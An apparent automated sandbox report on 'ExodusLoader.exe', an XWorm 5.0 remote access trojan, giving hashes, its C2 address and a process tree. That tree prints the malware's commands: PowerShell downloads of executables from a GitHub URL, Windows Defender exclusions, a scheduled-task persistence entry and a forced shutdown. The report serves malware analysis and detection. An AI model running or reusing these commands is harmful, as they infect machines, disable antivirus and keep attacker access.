Overview

overview

10

Static

static

3

ExodusLoader.exe

windows7-x64

8

ExodusLoader.exe

windows10-2004-x64

Analysis

  • max time kernel
    58s
  • max time network
    61s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 01:39

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    ExodusLoader.exe

  • Size

    89KB

  • MD5

    2f3405fa61bec944ed9d869adb6a37e3

  • SHA1

    4a3c839b899809ba89a99eaadecf4da6d71e8256

  • SHA256

    ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

  • SHA512

    72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0

  • SSDEEP

    1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    System.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6E1.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
      • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
        "C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDEB7.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2260
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:2876
      • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
        "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
        3⤵
        • Executes dropped EXE
        PID:3784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2024
  • C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:3260
    • C:\Windows\system32\shutdown.exe
      shutdown.exe /f /s /t 0
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3860
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3975055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:4072

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    08f9f3eb63ff567d1ee2a25e9bbf18f0

    SHA1

    6bf06056d1bb14c183490caf950e29ac9d73643a

    SHA256

    82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

    SHA512

    425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    636d0a4204c5fb9ee833b9818dd657f8

    SHA1

    3192acbf342deb46a7e305121d2e6aad3efd2157

    SHA256

    0cabaf308937e0961d4c9ca9168c6a795dd3063ba405cc80efe7afba7e1590f8

    SHA512

    630ab403f500f825e019c72cf15c96139fb85ed95c5566677c6fc80a36fe60624cd4cf513faf8a31d0bb0f03717d5090e7c0237dce339b2373673782a3409b8b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    f4cd59fec6cf54c85fc53e911914bf82

    SHA1

    50c1bf0969af6099d4b602a1d923a9b693a9b9ff

    SHA256

    70329406d55a7f671e2c30943772bfde19ceb53f7a402222aa0f74669f741f17

    SHA512

    5cfc2de8d95b1670570908c65389391f107d0f023f8a92412f001bb61982301e3405b692390c502b3f302df907fa1231cd056863cc9151dbbdb59c579858d5dc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6E1.bat
    Filesize

    491B

    MD5

    54436d8e8995d677f8732385734718bc

    SHA1

    246137700bee34238352177b56fa1c0f674a6d0b

    SHA256

    20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

    SHA512

    57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    Filesize

    507KB

    MD5

    470ccdab5d7da8aafc11490e4c71e612

    SHA1

    bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

    SHA256

    849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

    SHA512

    6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
    Filesize

    227KB

    MD5

    38b7704d2b199559ada166401f1d51c1

    SHA1

    3376eec35cd4616ba8127b976a8667e7a0aac87d

    SHA256

    153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

    SHA512

    07b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mg5gxo5r.uk4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpDEB7.tmp.bat
    Filesize

    164B

    MD5

    35ae3b57676d0cde9b8e73c7a97bb6c2

    SHA1

    64bf67511a05a89aa44c6581724c89d0d97d80a0

    SHA256

    5e4567f63f6baf09c8554b4baed5e4e44704194a6926c1ca3ac71c73b9ac6da2

    SHA512

    80ce739fcfe38d34d93a6a303aa81116e782be04e069a18ddbcf07cb37a5fc16eaa08df81cbf9ba55a145ee7766c0eae86a0091ebf36928d1d079a3cb9a990f8

    Download Submit

  • memory/880-14-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/880-18-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/880-13-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/880-3-0x0000016FA6080000-0x0000016FA60A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/880-2-0x00007FFCF8CB3000-0x00007FFCF8CB5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1044-22-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1044-21-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1044-35-0x0000026922770000-0x000002692298C000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/1044-36-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1044-20-0x00007FFCF8CB0000-0x00007FFCF9771000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2636-73-0x00000000006B0000-0x00000000006BE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2636-78-0x000000001AE20000-0x000000001AE2C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/4468-42-0x00000000001F0000-0x0000000000230000-memory.dmp

    Filesize

    256KB

    Download